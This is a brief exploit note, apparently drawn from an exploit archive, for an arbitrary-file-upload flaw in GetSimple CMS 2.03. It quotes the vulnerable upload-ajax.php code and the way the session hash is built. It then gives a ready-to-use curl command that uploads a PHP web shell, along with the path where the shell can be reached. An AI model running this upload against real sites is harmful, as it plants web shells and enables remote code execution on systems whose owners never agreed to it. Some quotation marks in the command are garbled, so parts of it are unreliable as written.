source: https://www.securityfocus.com/bid/46427/info GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. GetSimple CMS 2.03 is vulnerable; other versions may also be affected. Bug Code: getsimple/admin/upload-ajax.php if ($_REQUEST['sessionHash'] === $SESSIONHASH) { if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $name = clean_img_name($_FILES['Filedata']['name']); $targetPath = GSDATAUPLOADPATH; $targetFile = str_replace(‘//’,'/’,$targetPath) . $name; move_uploaded_file($tempFile, $targetFile); ---------------------------------------------------------------------- Generating SESSIONHASH: md5( $salt. $sitename) [XPL] curl -F “Filedata=@yourshell.txt;filename=shell.php” http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO After, enjoy your Bacon-Shell here ...http://getsimple_localhost/ data/uploads/shell.php